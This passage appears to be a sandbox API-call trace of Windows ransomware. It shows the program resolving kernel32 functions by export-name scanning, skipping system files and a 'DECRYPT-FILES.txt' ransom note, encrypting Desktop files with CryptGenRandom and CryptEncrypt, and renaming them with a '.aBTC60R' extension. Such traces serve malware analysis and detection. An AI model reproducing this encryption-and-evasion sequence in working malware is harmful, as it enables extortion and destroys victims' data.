| out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.619] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.619] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.619] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.619] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.619] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.619] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.619] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.619] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.619] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.619] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.619] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.619] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.619] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.619] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.619] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.619] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.619] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.619] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.620] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.620] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.620] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.620] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.620] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.620] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.620] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.620] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.620] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.620] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.620] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.620] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RfkfJ2oClDUlU_N3bh.mkv") returned 60 [0083.620] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RfkfJ2oClDUlU_N3bh.mkv.aBTC60R") returned 68 [0083.620] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RfkfJ2oClDUlU_N3bh.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rfkfj2ocldulu_n3bh.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RfkfJ2oClDUlU_N3bh.mkv.aBTC60R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rfkfj2ocldulu_n3bh.mkv.abtc60r"), dwFlags=0x0) returned 1 [0083.621] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.621] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.621] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.621] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb58ce5a0, ftCreationTime.dwHighDateTime=0x1d4c8b6, ftLastAccessTime.dwLowDateTime=0x87843d0, ftLastAccessTime.dwHighDateTime=0x1d4d501, ftLastWriteTime.dwLowDateTime=0x87843d0, ftLastWriteTime.dwHighDateTime=0x1d4d501, nFileSizeHigh=0x0, nFileSizeLow=0xeacb, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-Py95c3wNN.mkv", cAlternateFileName="S-PY95~1.MKV")) returned 1 [0083.621] lstrcmpiW (lpString1="S-Py95c3wNN.mkv", lpString2="DECRYPT-FILES.txt") returned 1 [0083.621] lstrcmpiW (lpString1="S-Py95c3wNN.mkv", lpString2="autorun.inf") returned 1 [0083.621] lstrcmpiW (lpString1="S-Py95c3wNN.mkv", lpString2="boot.ini") returned 1 [0083.621] lstrcmpiW (lpString1="S-Py95c3wNN.mkv", lpString2="desktop.ini") returned 1 [0083.622] lstrcmpiW (lpString1="S-Py95c3wNN.mkv", lpString2="ntuser.dat") returned 1 [0083.622] lstrcmpiW (lpString1="S-Py95c3wNN.mkv", lpString2="iconcache.db") returned 1 [0083.622] lstrcmpiW (lpString1="S-Py95c3wNN.mkv", lpString2="bootsect.bak") returned 1 [0083.622] lstrcmpiW (lpString1="S-Py95c3wNN.mkv", lpString2="ntuser.dat.log") returned 1 [0083.622] lstrcmpiW (lpString1="S-Py95c3wNN.mkv", lpString2="thumbs.db") returned -1 [0083.622] lstrcmpiW (lpString1="S-Py95c3wNN.mkv", lpString2="Bootfont.bin") returned 1 [0083.622] lstrlenW (lpString="S-Py95c3wNN.mkv") returned 15 [0083.622] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0083.622] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0083.622] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0083.622] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0083.622] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.622] lstrlenW (lpString="S-Py95c3wNN.mkv") returned 15 [0083.622] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.622] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="S-Py95c3wNN.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-Py95c3wNN.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-Py95c3wNN.mkv" [0083.622] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-Py95c3wNN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s-py95c3wnn.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.622] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=60107) returned 1 [0083.622] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.622] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.623] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.623] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.623] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.623] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.623] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.624] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.624] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.625] CloseHandle (hObject=0x414) returned 1 [0083.625] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.625] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.626] CloseHandle (hObject=0x0) returned 0 [0083.626] CloseHandle (hObject=0x410) returned 1 [0083.626] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.627] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.627] GetTickCount () returned 0x114d5f5 [0083.627] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.627] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.627] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.627] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.627] lstrlenA (lpString="kernel32.dll") returned 12 [0083.628] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.628] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.628] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.628] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.628] lstrlenA (lpString="ADDATOMA") returned 8 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.628] lstrlenA (lpString="ADDATOMW") returned 8 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.628] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.628] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.628] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.628] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.628] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.628] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.628] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.629] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.629] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.629] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.629] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.629] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.629] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.629] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.629] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.629] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.629] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.629] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.629] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.629] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.629] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.629] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.629] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.629] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.629] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.629] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.630] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.630] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.630] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.630] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.630] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.630] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.630] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.630] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.630] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.630] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.630] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.630] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.630] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.630] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.630] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.630] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.630] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.630] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.630] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.631] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.631] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.631] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.631] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.631] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.631] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.631] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.631] lstrlenA (lpString="BEEP") returned 4 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.631] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.631] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.631] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.631] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.631] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.631] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.631] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.631] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.631] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.631] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.631] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" 